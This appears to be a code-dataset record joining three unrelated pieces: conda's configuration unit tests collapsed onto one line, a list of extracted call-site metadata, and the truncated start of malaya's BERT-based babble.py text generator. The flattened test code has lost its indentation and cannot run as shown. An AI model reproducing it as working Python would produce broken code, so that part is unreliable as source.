iterkeys(config.normalize_urls(['defaults', 'system', 'https://anaconda.org/username', 'file:///Users/username/repo', 'username'])): assert (channel.endswith('/%s/' % current_platform) or channel.endswith('/noarch/')) self.assertEqual(config.normalize_urls([ 'defaults', 'system', 'https://conda.anaconda.org/username', 'file:///Users/username/repo', 'username' ], 'osx-64'), {'file:///Users/username/repo/noarch/': ('file:///Users/username/repo', 6), 'file:///Users/username/repo/osx-64/': ('file:///Users/username/repo', 6), 'http://repo.continuum.io/pkgs/free/noarch/': (None, 1), 'http://repo.continuum.io/pkgs/free/osx-64/': (None, 1), 'http://repo.continuum.io/pkgs/pro/noarch/': (None, 1), 'http://repo.continuum.io/pkgs/pro/osx-64/': (None, 1), 'http://some.custom/channel/noarch/': ('http://some.custom/channel', 3), 'http://some.custom/channel/osx-64/': ('http://some.custom/channel', 3), 'https://conda.anaconda.org/username/noarch/': ('https://conda.anaconda.org/username', 5), 'https://conda.anaconda.org/username/osx-64/': ('https://conda.anaconda.org/username', 5), 'https://your.repo/binstar_username/noarch/': ('binstar_username', 2), 'https://your.repo/binstar_username/osx-64/': ('binstar_username', 2), 
'https://your.repo/username/noarch/': ('username', 7), 'https://your.repo/username/osx-64/': ('username', 7)}) test_condarc = os.path.join(os.path.dirname(__file__), 'test_condarc') def _read_test_condarc(): with open(test_condarc) as f: return f.read() # Tests for the conda config command # FIXME This shoiuld be multiple individual tests @pytest.mark.slow def test_config_command_basics(): try: # Test that creating the file adds the defaults channel assert not os.path.exists('test_condarc') stdout, stderr = run_conda_command('config', '--file', test_condarc, '--add', 'channels', 'test') assert stdout == stderr == '' assert _read_test_condarc() == """\ channels: - test - defaults """ os.unlink(test_condarc) # When defaults is explicitly given, it should not be added stdout, stderr = run_conda_command('config', '--file', test_condarc, '--add', 'channels', 'test', '--add', 'channels', 'defaults') assert stdout == stderr == '' assert _read_test_condarc() == """\ channels: - defaults - test """ os.unlink(test_condarc) # Duplicate keys should not be added twice stdout, stderr = run_conda_command('config', '--file', test_condarc, '--add', 'channels', 'test') assert stdout == stderr == '' stdout, stderr = run_conda_command('config', '--file', test_condarc, '--add', 'channels', 'test') assert stdout == '' assert stderr == "Skipping channels: test, item already exists" assert _read_test_condarc() == """\ channels: - test - defaults """ os.unlink(test_condarc) # Test creating a new file with --set stdout, stderr = run_conda_command('config', '--file', test_condarc, '--set', 'always_yes', 'true') assert stdout == stderr == '' assert _read_test_condarc() == """\ always_yes: true """ os.unlink(test_condarc) finally: try: pass os.unlink(test_condarc) except OSError: pass # FIXME Break into multiple tests @pytest.mark.slow def test_config_command_get(): try: # Test --get with open(test_condarc, 'w') as f: f.write("""\ channels: - test - defaults create_default_packages: - ipython - numpy changeps1: no always_yes: true invalid_key: yes channel_alias: http://alpha.conda.anaconda.org """) stdout, stderr = run_conda_command('config', '--file', test_condarc, '--get') assert stdout == """\ --set always_yes True --set changeps1 no --set channel_alias http://alpha.conda.anaconda.org --add channels 'defaults' --add channels 'test' --add create_default_packages 'numpy' --add create_default_packages 'ipython'\ """ assert stderr == "unknown key invalid_key" stdout, stderr = run_conda_command('config', '--file', test_condarc, '--get', 'channels') assert stdout == """\ --add channels 'defaults' --add channels 'test'\ """ assert stderr == "" stdout, stderr = run_conda_command('config', '--file', test_condarc, '--get', 'changeps1') assert stdout == """\ --set changeps1 no\ """ assert stderr == "" stdout, stderr = run_conda_command('config', '--file', test_condarc, '--get', 'changeps1', 'channels') assert stdout == """\ --set changeps1 no --add channels 'defaults' --add channels 'test'\ """ assert stderr == "" stdout, stderr = run_conda_command('config', '--file', test_condarc, '--get', 'allow_softlinks') assert stdout == "" assert stderr == "" stdout, stderr = run_conda_command('config', '--file', test_condarc, '--get', 'track_features') assert stdout == "" assert stderr == "" stdout, stderr = run_conda_command('config', '--file', test_condarc, '--get', 'invalid_key') assert stdout == "" assert "invalid choice: 'invalid_key'" in stderr stdout, stderr = run_conda_command('config', '--file', test_condarc, '--get', 
'not_valid_key') assert stdout == "" assert "invalid choice: 'not_valid_key'" in stderr os.unlink(test_condarc) finally: try: pass os.unlink(test_condarc) except OSError: pass # FIXME Break into multiple tests @pytest.mark.slow def test_config_command_parser(): try: # Now test the YAML "parser" # Channels is normal content. # create_default_packages has extra spaces in list items condarc = """\ channels: - test - defaults create_default_packages : - ipython - numpy changeps1: false # Here is a comment always_yes: yes """ # First verify that this itself is valid YAML assert yaml.load(condarc, Loader=yaml.RoundTripLoader) == {'channels': ['test', 'defaults'], 'create_default_packages': ['ipython', 'numpy'], 'changeps1': False, 'always_yes': 'yes'} with open(test_condarc, 'w') as f: f.write(condarc) stdout, stderr = run_conda_command('config', '--file', test_condarc, '--get') assert stdout == """\ --set always_yes yes --set changeps1 False --add channels 'defaults' --add channels 'test' --add create_default_packages 'numpy' --add create_default_packages 'ipython'\ """ stdout, stderr = run_conda_command('config', '--file', test_condarc, '--add', 'channels', 'mychannel') assert stdout == stderr == '' assert _read_test_condarc() == """\ channels: - mychannel - test - defaults create_default_packages: - ipython - numpy changeps1: false # Here is a comment always_yes: 'yes' """ stdout, stderr = run_conda_command('config', '--file', test_condarc, '--set', 'changeps1', 'true') assert stdout == stderr == '' assert _read_test_condarc() == """\ channels: - mychannel - test - defaults create_default_packages: - ipython - numpy changeps1: true # Here is a comment always_yes: 'yes' """ os.unlink(test_condarc) # Test adding a new list key. We couldn't test this above because it # doesn't work yet with odd whitespace condarc = """\ channels: - test - defaults always_yes: true """ with open(test_condarc, 'w') as f: f.write(condarc) stdout, stderr = run_conda_command('config', '--file', test_condarc, '--add', 'disallow', 'perl') assert stdout == stderr == '' assert _read_test_condarc() == condarc + """\ disallow: - perl """ os.unlink(test_condarc) finally: try: pass os.unlink(test_condarc) except OSError: pass # FIXME Break into multiple tests @pytest.mark.slow def test_config_command_remove_force(): try: # Finally, test --remove, --remove-key run_conda_command('config', '--file', test_condarc, '--add', 'channels', 'test') run_conda_command('config', '--file', test_condarc, '--set', 'always_yes', 'true') stdout, stderr = run_conda_command('config', '--file', test_condarc, '--remove', 'channels', 'test') assert stdout == stderr == '' assert yaml.load(_read_test_condarc(), Loader=yaml.RoundTripLoader) == {'channels': ['defaults'], 'always_yes': True} stdout, stderr = run_conda_command('config', '--file', test_condarc, '--remove', 'channels', 'test', '--force') assert stdout == '' assert stderr == "Error: 'test' is not in the 'channels' key of the config file" stdout, stderr = run_conda_command('config', '--file', test_condarc, '--remove', 'disallow', 'python', '--force') assert stdout == '' assert stderr == "Error: key 'disallow' is not in the config file" stdout, stderr = run_conda_command('config', '--file', test_condarc, '--remove-key', 'always_yes', '--force') assert stdout == stderr == '' assert yaml.load(_read_test_condarc(), Loader=yaml.RoundTripLoader) == {'channels': ['defaults']} stdout, stderr = run_conda_command('config', '--file', test_condarc, '--remove-key', 'always_yes', '--force') assert stdout 
== '' assert stderr == "Error: key 'always_yes' is not in the config file" os.unlink(test_condarc) finally: try: pass os.unlink(test_condarc) except OSError: pass # FIXME Break into multiple tests @pytest.mark.slow def test_config_command_bad_args(): try: stdout, stderr = run_conda_command('config', '--file', test_condarc, '--add', 'notarealkey', 'test') assert stdout == '' assert not exists(test_condarc) stdout, stderr = run_conda_command('config', '--file', test_condarc, '--set', 'notarealkey', 'yes') assert stdout == '' assert not exists(test_condarc) finally: try: pass os.unlink(test_condarc) except OSError: pass def test_invalid_rc(): # Some tests for unexpected input in the condarc, like keys that are the # wrong type try: condarc = """\ channels: """ with open(test_condarc, 'w') as f: f.write(condarc) stdout, stderr = run_conda_command('config', '--file', test_condarc, '--add', 'channels', 'test') assert stdout == '' assert stderr == """\ Error: Could not parse the yaml file. Use -f to use the yaml parser (this will remove any structure or comments from the existing .condarc file). Reason: key 'channels' should be a list, not NoneType.""" assert _read_test_condarc() == condarc os.unlink(test_condarc) finally: try: pass os.unlink(test_condarc) except OSError: pass def test_config_set(): # Test the config set command # Make sure it accepts only boolean values for boolean keys and any value for string keys try: stdout, stderr = run_conda_command('config', '--file', test_condarc, '--set', 'always_yes', 'yep') assert stdout == '' assert stderr == 'Error: Key: always_yes; yep is not a YAML boolean.' finally: try: os.unlink(test_condarc) except OSError: pass def test_set_rc_string(): # Test setting string keys in .condarc # We specifically test ssl_verify since it can be either a boolean or a string try: stdout, stderr = run_conda_command('config', '--file', test_condarc, '--set', 'ssl_verify', 'yes') assert stdout == '' assert stderr == '' verify = yaml.load(open(test_condarc, 'r'), Loader=yaml.RoundTripLoader)['ssl_verify'] assert verify == 'yes' stdout, stderr = run_conda_command('config', '--file', test_condarc, '--set', 'ssl_verify', 'test_string.crt') assert stdout == '' assert stderr == '' verify = yaml.load(open(test_condarc, 'r'), Loader=yaml.RoundTripLoader)['ssl_verify'] assert verify == 'test_string.crt' os.unlink(test_condarc) finally: try: os.unlink(test_condarc) except OSError: pass
[((18, 7, 18, 17), 'conda.utils.get_yaml', 'get_yaml', ({}, {}), '()', False, 'from conda.utils import get_yaml\n'), ((21, 22, 21, 39), 'os.path.dirname', 'dirname', ({(21, 30, 21, 38): '__file__'}, {}), '(__file__)', False, 'from os.path import dirname, join, exists\n'), ((102, 28, 102, 53), 'os.path.dirname', 'os.path.dirname', ({(102, 44, 102, 52): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((41, 20, 41, 55), 'conda.config.load_condarc', 'config.load_condarc', ({(41, 40, 41, 54): 'config.rc_path'}, {}), '(config.rc_path)', True, 'import conda.config as config\n'), ((59, 20, 59, 42), 'os.path.join', 'join', ({(59, 25, 59, 33): 'root_dir', (59, 35, 59, 41): '"""pkgs"""'}, {}), "(root_dir, 'pkgs')", False, 'from os.path import dirname, join, exists\n'), ((115, 25, 116, 31), 'tests.helpers.run_conda_command', 'run_conda_command', ({(115, 43, 115, 51): '"""config"""', (115, 53, 115, 61): '"""--file"""', (115, 63, 115, 75): 'test_condarc', (115, 77, 115, 84): '"""--add"""', (116, 12, 116, 22): '"""channels"""', (116, 24, 116, 30): '"""test"""'}, {}), "('config', '--file', test_condarc, '--add', 'channels', 'test'\n )", False, 'from tests.helpers import run_conda_command\n'), ((123, 8, 123, 31), 'os.unlink', 'os.unlink', ({(123, 18, 123, 30): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((126, 25, 127, 56), 'tests.helpers.run_conda_command', 'run_conda_command', ({(126, 43, 126, 51): '"""config"""', (126, 53, 126, 61): '"""--file"""', (126, 63, 126, 75): 'test_condarc', (126, 77, 126, 84): '"""--add"""', (127, 4, 127, 14): '"""channels"""', (127, 16, 127, 22): '"""test"""', (127, 24, 127, 31): '"""--add"""', (127, 33, 127, 43): '"""channels"""', (127, 45, 127, 55): '"""defaults"""'}, {}), "('config', '--file', test_condarc, '--add', 'channels',\n 'test', '--add', 'channels', 'defaults')", False, 'from tests.helpers import run_conda_command\n'), ((134, 8, 134, 31), 'os.unlink', 'os.unlink', ({(134, 18, 134, 30): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((137, 25, 138, 27), 'tests.helpers.run_conda_command', 'run_conda_command', ({(137, 43, 137, 51): '"""config"""', (137, 53, 137, 61): '"""--file"""', (137, 63, 137, 75): 'test_condarc', (137, 77, 137, 84): '"""--add"""', (138, 8, 138, 18): '"""channels"""', (138, 20, 138, 26): '"""test"""'}, {}), "('config', '--file', test_condarc, '--add', 'channels', 'test'\n )", False, 'from tests.helpers import run_conda_command\n'), ((140, 25, 141, 27), 'tests.helpers.run_conda_command', 'run_conda_command', ({(140, 43, 140, 51): '"""config"""', (140, 53, 140, 61): '"""--file"""', (140, 63, 140, 75): 'test_condarc', (140, 77, 140, 84): '"""--add"""', (141, 8, 141, 18): '"""channels"""', (141, 20, 141, 26): '"""test"""'}, {}), "('config', '--file', test_condarc, '--add', 'channels', 'test'\n )", False, 'from tests.helpers import run_conda_command\n'), ((149, 8, 149, 31), 'os.unlink', 'os.unlink', ({(149, 18, 149, 30): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((152, 25, 153, 38), 'tests.helpers.run_conda_command', 'run_conda_command', ({(152, 43, 152, 51): '"""config"""', (152, 53, 152, 61): '"""--file"""', (152, 63, 152, 75): 'test_condarc', (153, 8, 153, 15): '"""--set"""', (153, 17, 153, 29): '"""always_yes"""', (153, 31, 153, 37): '"""true"""'}, {}), "('config', '--file', test_condarc, '--set', 'always_yes',\n 'true')", False, 'from tests.helpers import run_conda_command\n'), ((158, 8, 158, 31), 'os.unlink', 'os.unlink', ({(158, 18, 158, 30): 'test_condarc'}, {}), '(test_condarc)', 
False, 'import os\n'), ((192, 25, 192, 85), 'tests.helpers.run_conda_command', 'run_conda_command', ({(192, 43, 192, 51): '"""config"""', (192, 53, 192, 61): '"""--file"""', (192, 63, 192, 75): 'test_condarc', (192, 77, 192, 84): '"""--get"""'}, {}), "('config', '--file', test_condarc, '--get')", False, 'from tests.helpers import run_conda_command\n'), ((204, 25, 205, 28), 'tests.helpers.run_conda_command', 'run_conda_command', ({(204, 43, 204, 51): '"""config"""', (204, 53, 204, 61): '"""--file"""', (204, 63, 204, 75): 'test_condarc', (205, 8, 205, 15): '"""--get"""', (205, 17, 205, 27): '"""channels"""'}, {}), "('config', '--file', test_condarc, '--get', 'channels')", False, 'from tests.helpers import run_conda_command\n'), ((213, 25, 214, 29), 'tests.helpers.run_conda_command', 'run_conda_command', ({(213, 43, 213, 51): '"""config"""', (213, 53, 213, 61): '"""--file"""', (213, 63, 213, 75): 'test_condarc', (214, 8, 214, 15): '"""--get"""', (214, 17, 214, 28): '"""changeps1"""'}, {}), "('config', '--file', test_condarc, '--get', 'changeps1')", False, 'from tests.helpers import run_conda_command\n'), ((221, 25, 222, 45), 'tests.helpers.run_conda_command', 'run_conda_command', ({(221, 43, 221, 51): '"""config"""', (221, 53, 221, 61): '"""--file"""', (221, 63, 221, 75): 'test_condarc', (222, 12, 222, 19): '"""--get"""', (222, 21, 222, 32): '"""changeps1"""', (222, 34, 222, 44): '"""channels"""'}, {}), "('config', '--file', test_condarc, '--get', 'changeps1',\n 'channels')", False, 'from tests.helpers import run_conda_command\n'), ((231, 25, 232, 35), 'tests.helpers.run_conda_command', 'run_conda_command', ({(231, 43, 231, 51): '"""config"""', (231, 53, 231, 61): '"""--file"""', (231, 63, 231, 75): 'test_condarc', (232, 8, 232, 15): '"""--get"""', (232, 17, 232, 34): '"""allow_softlinks"""'}, {}), "('config', '--file', test_condarc, '--get', 'allow_softlinks')", False, 'from tests.helpers import run_conda_command\n'), ((237, 25, 238, 34), 'tests.helpers.run_conda_command', 'run_conda_command', ({(237, 43, 237, 51): '"""config"""', (237, 53, 237, 61): '"""--file"""', (237, 63, 237, 75): 'test_condarc', (238, 8, 238, 15): '"""--get"""', (238, 17, 238, 33): '"""track_features"""'}, {}), "('config', '--file', test_condarc, '--get', 'track_features')", False, 'from tests.helpers import run_conda_command\n'), ((243, 25, 244, 31), 'tests.helpers.run_conda_command', 'run_conda_command', ({(243, 43, 243, 51): '"""config"""', (243, 53, 243, 61): '"""--file"""', (243, 63, 243, 75): 'test_condarc', (244, 8, 244, 15): '"""--get"""', (244, 17, 244, 30): '"""invalid_key"""'}, {}), "('config', '--file', test_condarc, '--get', 'invalid_key')", False, 'from tests.helpers import run_conda_command\n'), ((249, 25, 250, 33), 'tests.helpers.run_conda_command', 'run_conda_command', ({(249, 43, 249, 51): '"""config"""', (249, 53, 249, 61): '"""--file"""', (249, 63, 249, 75): 'test_condarc', (250, 8, 250, 15): '"""--get"""', (250, 17, 250, 32): '"""not_valid_key"""'}, {}), "('config', '--file', test_condarc, '--get', 'not_valid_key')", False, 'from tests.helpers import run_conda_command\n'), ((255, 8, 255, 31), 'os.unlink', 'os.unlink', ({(255, 18, 255, 30): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((295, 25, 295, 85), 'tests.helpers.run_conda_command', 'run_conda_command', ({(295, 43, 295, 51): '"""config"""', (295, 53, 295, 61): '"""--file"""', (295, 63, 295, 75): 'test_condarc', (295, 77, 295, 84): '"""--get"""'}, {}), "('config', '--file', test_condarc, '--get')", False, 'from tests.helpers 
import run_conda_command\n'), ((306, 25, 307, 36), 'tests.helpers.run_conda_command', 'run_conda_command', ({(306, 43, 306, 51): '"""config"""', (306, 53, 306, 61): '"""--file"""', (306, 63, 306, 75): 'test_condarc', (306, 77, 306, 84): '"""--add"""', (307, 12, 307, 22): '"""channels"""', (307, 24, 307, 35): '"""mychannel"""'}, {}), "('config', '--file', test_condarc, '--add', 'channels',\n 'mychannel')", False, 'from tests.helpers import run_conda_command\n'), ((326, 25, 327, 41), 'tests.helpers.run_conda_command', 'run_conda_command', ({(326, 43, 326, 51): '"""config"""', (326, 53, 326, 61): '"""--file"""', (326, 63, 326, 75): 'test_condarc', (327, 12, 327, 19): '"""--set"""', (327, 21, 327, 32): '"""changeps1"""', (327, 34, 327, 40): '"""true"""'}, {}), "('config', '--file', test_condarc, '--set', 'changeps1',\n 'true')", False, 'from tests.helpers import run_conda_command\n'), ((347, 8, 347, 31), 'os.unlink', 'os.unlink', ({(347, 18, 347, 30): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((362, 25, 363, 31), 'tests.helpers.run_conda_command', 'run_conda_command', ({(362, 43, 362, 51): '"""config"""', (362, 53, 362, 61): '"""--file"""', (362, 63, 362, 75): 'test_condarc', (362, 77, 362, 84): '"""--add"""', (363, 12, 363, 22): '"""disallow"""', (363, 24, 363, 30): '"""perl"""'}, {}), "('config', '--file', test_condarc, '--add', 'disallow', 'perl'\n )", False, 'from tests.helpers import run_conda_command\n'), ((369, 8, 369, 31), 'os.unlink', 'os.unlink', ({(369, 18, 369, 30): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((385, 8, 386, 31), 'tests.helpers.run_conda_command', 'run_conda_command', ({(385, 26, 385, 34): '"""config"""', (385, 36, 385, 44): '"""--file"""', (385, 46, 385, 58): 'test_condarc', (385, 60, 385, 67): '"""--add"""', (386, 12, 386, 22): '"""channels"""', (386, 24, 386, 30): '"""test"""'}, {}), "('config', '--file', test_condarc, '--add', 'channels', 'test'\n )", False, 'from tests.helpers import run_conda_command\n'), ((387, 8, 388, 33), 'tests.helpers.run_conda_command', 'run_conda_command', ({(387, 26, 387, 34): '"""config"""', (387, 36, 387, 44): '"""--file"""', (387, 46, 387, 58): 'test_condarc', (387, 60, 387, 67): '"""--set"""', (388, 12, 388, 24): '"""always_yes"""', (388, 26, 388, 32): '"""true"""'}, {}), "('config', '--file', test_condarc, '--set', 'always_yes',\n 'true')", False, 'from tests.helpers import run_conda_command\n'), ((389, 25, 390, 43), 'tests.helpers.run_conda_command', 'run_conda_command', ({(389, 43, 389, 51): '"""config"""', (389, 53, 389, 61): '"""--file"""', (389, 63, 389, 75): 'test_condarc', (390, 12, 390, 22): '"""--remove"""', (390, 24, 390, 34): '"""channels"""', (390, 36, 390, 42): '"""test"""'}, {}), "('config', '--file', test_condarc, '--remove', 'channels',\n 'test')", False, 'from tests.helpers import run_conda_command\n'), ((395, 25, 396, 54), 'tests.helpers.run_conda_command', 'run_conda_command', ({(395, 43, 395, 51): '"""config"""', (395, 53, 395, 61): '"""--file"""', (395, 63, 395, 75): 'test_condarc', (396, 12, 396, 22): '"""--remove"""', (396, 24, 396, 34): '"""channels"""', (396, 36, 396, 42): '"""test"""', (396, 44, 396, 53): '"""--force"""'}, {}), "('config', '--file', test_condarc, '--remove', 'channels',\n 'test', '--force')", False, 'from tests.helpers import run_conda_command\n'), ((400, 25, 401, 56), 'tests.helpers.run_conda_command', 'run_conda_command', ({(400, 43, 400, 51): '"""config"""', (400, 53, 400, 61): '"""--file"""', (400, 63, 400, 75): 'test_condarc', (401, 12, 401, 
22): '"""--remove"""', (401, 24, 401, 34): '"""disallow"""', (401, 36, 401, 44): '"""python"""', (401, 46, 401, 55): '"""--force"""'}, {}), "('config', '--file', test_condarc, '--remove', 'disallow',\n 'python', '--force')", False, 'from tests.helpers import run_conda_command\n'), ((405, 25, 406, 52), 'tests.helpers.run_conda_command', 'run_conda_command', ({(405, 43, 405, 51): '"""config"""', (405, 53, 405, 61): '"""--file"""', (405, 63, 405, 75): 'test_condarc', (406, 12, 406, 26): '"""--remove-key"""', (406, 28, 406, 40): '"""always_yes"""', (406, 42, 406, 51): '"""--force"""'}, {}), "('config', '--file', test_condarc, '--remove-key',\n 'always_yes', '--force')", False, 'from tests.helpers import run_conda_command\n'), ((410, 25, 411, 52), 'tests.helpers.run_conda_command', 'run_conda_command', ({(410, 43, 410, 51): '"""config"""', (410, 53, 410, 61): '"""--file"""', (410, 63, 410, 75): 'test_condarc', (411, 12, 411, 26): '"""--remove-key"""', (411, 28, 411, 40): '"""always_yes"""', (411, 42, 411, 51): '"""--force"""'}, {}), "('config', '--file', test_condarc, '--remove-key',\n 'always_yes', '--force')", False, 'from tests.helpers import run_conda_command\n'), ((415, 8, 415, 31), 'os.unlink', 'os.unlink', ({(415, 18, 415, 30): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((429, 25, 430, 34), 'tests.helpers.run_conda_command', 'run_conda_command', ({(429, 43, 429, 51): '"""config"""', (429, 53, 429, 61): '"""--file"""', (429, 63, 429, 75): 'test_condarc', (429, 77, 429, 84): '"""--add"""', (430, 12, 430, 25): '"""notarealkey"""', (430, 27, 430, 33): '"""test"""'}, {}), "('config', '--file', test_condarc, '--add', 'notarealkey',\n 'test')", False, 'from tests.helpers import run_conda_command\n'), ((435, 25, 436, 33), 'tests.helpers.run_conda_command', 'run_conda_command', ({(435, 43, 435, 51): '"""config"""', (435, 53, 435, 61): '"""--file"""', (435, 63, 435, 75): 'test_condarc', (435, 77, 435, 84): '"""--set"""', (436, 12, 436, 25): '"""notarealkey"""', (436, 27, 436, 32): '"""yes"""'}, {}), "('config', '--file', test_condarc, '--set', 'notarealkey',\n 'yes')", False, 'from tests.helpers import run_conda_command\n'), ((459, 25, 460, 71), 'tests.helpers.run_conda_command', 'run_conda_command', ({(459, 43, 459, 51): '"""config"""', (459, 53, 459, 61): '"""--file"""', (459, 63, 459, 75): 'test_condarc', (460, 43, 460, 50): '"""--add"""', (460, 52, 460, 62): '"""channels"""', (460, 64, 460, 70): '"""test"""'}, {}), "('config', '--file', test_condarc, '--add', 'channels', 'test'\n )", False, 'from tests.helpers import run_conda_command\n'), ((468, 8, 468, 31), 'os.unlink', 'os.unlink', ({(468, 18, 468, 30): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((481, 25, 482, 72), 'tests.helpers.run_conda_command', 'run_conda_command', ({(481, 43, 481, 51): '"""config"""', (481, 53, 481, 61): '"""--file"""', (481, 63, 481, 75): 'test_condarc', (482, 43, 482, 50): '"""--set"""', (482, 52, 482, 64): '"""always_yes"""', (482, 66, 482, 71): '"""yep"""'}, {}), "('config', '--file', test_condarc, '--set', 'always_yes',\n 'yep')", False, 'from tests.helpers import run_conda_command\n'), ((498, 25, 499, 72), 'tests.helpers.run_conda_command', 'run_conda_command', ({(498, 43, 498, 51): '"""config"""', (498, 53, 498, 61): '"""--file"""', (498, 63, 498, 75): 'test_condarc', (499, 43, 499, 50): '"""--set"""', (499, 52, 499, 64): '"""ssl_verify"""', (499, 66, 499, 71): '"""yes"""'}, {}), "('config', '--file', test_condarc, '--set', 'ssl_verify',\n 'yes')", False, 'from 
tests.helpers import run_conda_command\n'), ((506, 25, 507, 84), 'tests.helpers.run_conda_command', 'run_conda_command', ({(506, 43, 506, 51): '"""config"""', (506, 53, 506, 61): '"""--file"""', (506, 63, 506, 75): 'test_condarc', (507, 43, 507, 50): '"""--set"""', (507, 52, 507, 64): '"""ssl_verify"""', (507, 66, 507, 83): '"""test_string.crt"""'}, {}), "('config', '--file', test_condarc, '--set', 'ssl_verify',\n 'test_string.crt')", False, 'from tests.helpers import run_conda_command\n'), ((515, 8, 515, 31), 'os.unlink', 'os.unlink', ({(515, 18, 515, 30): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((68, 25, 68, 51), 'conda.config.get_proxy_servers', 'config.get_proxy_servers', ({}, {}), '()', True, 'import conda.config as config\n'), ((75, 15, 75, 45), 'conda.config.rc.get', 'config.rc.get', ({(75, 29, 75, 44): '"""channel_alias"""'}, {}), "('channel_alias')", True, 'import conda.config as config\n'), ((77, 32, 79, 24), 'conda.config.normalize_urls', 'config.normalize_urls', ({(77, 54, 79, 23): "['defaults', 'system', 'https://anaconda.org/username',\n 'file:///Users/username/repo', 'username']"}, {}), "(['defaults', 'system',\n 'https://anaconda.org/username', 'file:///Users/username/repo', 'username']\n )", True, 'import conda.config as config\n'), ((82, 25, 85, 24), 'conda.config.normalize_urls', 'config.normalize_urls', ({(82, 47, 85, 13): "['defaults', 'system', 'https://conda.anaconda.org/username',\n 'file:///Users/username/repo', 'username']", (85, 15, 85, 23): '"""osx-64"""'}, {}), "(['defaults', 'system',\n 'https://conda.anaconda.org/username', 'file:///Users/username/repo',\n 'username'], 'osx-64')", True, 'import conda.config as config\n'), ((114, 19, 114, 49), 'os.path.exists', 'os.path.exists', ({(114, 34, 114, 48): '"""test_condarc"""'}, {}), "('test_condarc')", False, 'import os\n'), ((163, 12, 163, 35), 'os.unlink', 'os.unlink', ({(163, 22, 163, 34): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((261, 12, 261, 35), 'os.unlink', 'os.unlink', ({(261, 22, 261, 34): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((375, 12, 375, 35), 'os.unlink', 'os.unlink', ({(375, 22, 375, 34): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((420, 12, 420, 35), 'os.unlink', 'os.unlink', ({(420, 22, 420, 34): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((433, 19, 433, 39), 'os.path.exists', 'exists', ({(433, 26, 433, 38): 'test_condarc'}, {}), '(test_condarc)', False, 'from os.path import dirname, join, exists\n'), ((439, 19, 439, 39), 'os.path.exists', 'exists', ({(439, 26, 439, 38): 'test_condarc'}, {}), '(test_condarc)', False, 'from os.path import dirname, join, exists\n'), ((444, 12, 444, 35), 'os.unlink', 'os.unlink', ({(444, 22, 444, 34): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((472, 12, 472, 35), 'os.unlink', 'os.unlink', ({(472, 22, 472, 34): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((489, 12, 489, 35), 'os.unlink', 'os.unlink', ({(489, 22, 489, 34): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((518, 12, 518, 35), 'os.unlink', 'os.unlink', ({(518, 22, 518, 34): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((61, 13, 61, 35), 'os.path.join', 'join', ({(61, 18, 61, 26): 'root_dir', (61, 28, 61, 34): '"""envs"""'}, {}), "(root_dir, 'envs')", False, 'from os.path import dirname, join, exists\n'), ((65, 29, 65, 62), 'conda.config.pkgs_dir_from_envs_dir', 'config.pkgs_dir_from_envs_dir', ({(65, 59, 65, 61): 'pi'}, {}), 
'(pi)', True, 'import conda.config as config\n')]
ahmed3991/malaya
malaya/transformers/babble.py
d90be6d5b2a1393a3f8b8b1ffa8ae676cdaa083c
# Bert has a Mouth, and It Must Speak: BERT as a Markov Random Field Language Model,
# by Alex Wang, Kyunghyun Cho, NeuralGen 2019
# https://colab.research.google.com/drive/1MxKZGtQ9SSBjTK5ArsZ5LKhkztzg52RV
# https://arxiv.org/abs/1902.04094

import tensorflow as tf
import tensorflow_probability as tfp
import numpy as np
import math
from malaya.text.bpe import merge_sentencepiece_tokens, merge_wordpiece_tokens

CLS = '[CLS]'
SEP = '[SEP]'
MASK = '[MASK]'


def topk_distributions(logits, top_k):
    with tf.InteractiveSession().as_default():
        logits = tf.convert_to_tensor(logits)
        kth_vals, kth_idx = tf.nn.top_k(logits, k = top_k)
        dist = tfp.distributions.categorical.Categorical(logits = kth_vals)
        idx = tf.gather(
            kth_idx, tf.expand_dims(dist.sample(), -1), batch_dims = 1
        )
        idx = tf.squeeze(idx, axis = -1)
        return idx.eval()


def distributions(logits):
    with tf.InteractiveSession().as_default():
        logits = tf.convert_to_tensor(logits)
        dist = tfp.distributions.categorical.Categorical(logits = logits)
        return dist.sample().eval()


def generate_step(
    logits,
    gen_idx,
    top_k = 0,
    temperature = 1.0,
    sample = False,
    return_list = True,
):
    logits = logits[:, gen_idx]
    logits = logits / temperature
    if top_k > 0:
        idx = topk_distributions(logits, top_k)
    elif sample:
        idx = distributions(logits)
    else:
        idx = np.argmax(logits, axis = -1)
    return idx.tolist() if return_list else idx


def tokenize_batch(batch, tokenizer):
    return [tokenizer.convert_tokens_to_ids(sent) for sent in batch]


def untokenize_batch(batch, tokenizer):
    return [tokenizer.convert_ids_to_tokens(sent) for sent in batch]


def get_init_text(seed_text, max_len, tokenizer, batch_size = 1):
    batch = [seed_text + [MASK] * max_len + [SEP] for _ in range(batch_size)]
    return tokenize_batch(batch, tokenizer)


def sequential_generation(
    seed_text,
    model,
    batch_size = 5,
    max_len = 15,
    leed_out_len = 1,
    temperature = 1.0,
    top_k = 100,
    burnin = 20,
):
    mask_id = model._tokenizer.vocab['[MASK]']
    sep_id = model._tokenizer.vocab['[SEP]']
    seed_text = model._tokenizer.tokenize(seed_text)
    seed_len = len(seed_text)
    batch = get_init_text(
        seed_text, max_len, model._tokenizer, batch_size = batch_size
    )

    for ii in range(max_len):
        inp = [sent[: seed_len + ii] + [sep_id] for sent in batch]
        batch = np.array(batch)
        masks = np.ones(batch.shape)
        segments = np.zeros(batch.shape)
        out = model._sess.run(
            model._logits,
            feed_dict = {
                model.X: batch,
                model.MASK: masks,
                model.segment_ids: segments,
            },
        )
        topk = top_k if (ii >= burnin) else 0
        idxs = generate_step(
            out,
